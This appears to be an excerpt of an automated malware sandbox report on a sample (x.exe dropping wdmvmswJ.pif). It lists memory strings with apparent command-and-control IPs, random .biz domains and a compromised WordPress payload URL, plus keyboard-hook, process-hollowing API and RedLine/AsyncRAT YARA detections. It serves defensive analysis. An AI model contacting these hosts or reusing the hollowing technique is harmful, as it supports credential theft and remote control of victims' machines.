Source: alg.exe, 00000010.00000003.2527920432.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2541384610.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/fwiohktfcqxxnbh
Source: alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/gs
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/m
Source: alg.exe, 00000010.00000003.2066991172.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/ohrgkx
Source: alg.exe, 00000010.00000003.2066991172.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/ohrgkxatb
Source: alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/s
Source: alg.exe, 00000010.00000003.1634866335.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1634866335.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/uqcynitxoaix
Source: alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/ohrgkx
Source: alg.exe, 00000010.00000003.1634866335.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177:80/uqcynitxoaix
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/55
Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/95Z4
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/T
Source: alg.exe, 00000010.00000003.1785132829.00000000005A1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/f
Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/gs
Source: alg.exe, 00000010.00000003.1797911265.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/p
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/pe6
Source: alg.exe, 00000010.00000003.1797911265.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/pu6
Source: alg.exe, 00000010.00000003.1785132829.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/s
Source: alg.exe, 00000010.00000003.1918263435.00000000005AD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1917843582.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197/vdvikkmvoibst
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.1785132829.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/f0
Source: alg.exe, 00000010.00000003.1797911265.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://82.112.184.197:80/p
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://bumxkqgxu.biz/
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: alg.exe, 00000010.00000003.2066991172.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dwrqljrr.biz/
Source: alg.exe, 00000010.00000003.2079470414.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nqwjmb.biz/
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: alg.exe, 00000010.00000003.2028087857.0000000000541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tbjrpv.biz/k7/pV
Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.delphiexpert.ru
Source: x.exe, 00000004.00000002.1593299514.000000007F670000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.1470846029.0000000000401000.00000020.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000A.00000003.1539123679.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.delphiexpert.ruopenSV
Source: x.exe, x.exe, 00000004.00000002.1544141056.0000000000780000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478142210.0000000002959000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1596172530.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588992126.0000000021CF5000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1478393290.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1555508277.000000000295A000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1588565232.0000000021AF0000.00000004.00000020.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000000.1541408812.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 0000001E.00000000.1659150073.0000000000416000.00000002.00000001.01000000.00000007.sdmp, wdmvmswJ.pif, 00000026.00000000.1748296146.0000000000416000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.pmail.com
Source: wdmvmswJ.pif, 0000000C.00000003.2071578798.0000000020950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com/
Source: x.exe, 00000004.00000002.1582582313.00000000208DD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com/wp-
Source: x.exe, 00000004.00000002.1582582313.00000000208EC000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.0000000000706000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.00000000208C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com/wp-admin/233_Jwsmvmdweya
Source: x.exe, 00000004.00000002.1544141056.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com/wp-admin/233_JwsmvmdweyaM
Source: x.exe, 00000004.00000002.1544141056.000000000072F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chichometextiles.com:443/wp-admin/233_Jwsmvmdweyah
Source: wdmvmswJ.pif, 0000000C.00000003.2111219568.0000000020950000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\wdmvmswJ.pif

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 38.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.2.wdmvmswJ.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 30.2.wdmvmswJ.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.2.wdmvmswJ.pif.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.wdmvmswJ.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.1.wdmvmswJ.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 38.2.wdmvmswJ.pif.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000026.00000001.1748961423.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001E.00000001.1659980996.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000001E.00000002.1740115481.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000001.1541928140.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000026.00000002.1813978225.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08670 NtUnmapViewOfSection,	4_2_02B08670
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08400 NtReadVirtualMemory,	4_2_02B08400
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B07A2C NtAllocateVirtualMemory,	4_2_02B07A2C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_02B0DC8C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02B0DC04
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02B08D70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_02B0DD70
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B07D78 NtWriteVirtualMemory,	4_2_02B07D78
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B07A2A NtAllocateVirtualMemory,	4_2_02B07A2A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B0DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_02B0DBB0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02B08D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02B08D6E
Source: C:\Users\Public\alpha.pif	Code function: 13_2_00024823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	13_2_00024823
Source: C:\Users\Public\alpha.pif	Code function: 13_2_0002643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	13_2_0002643A
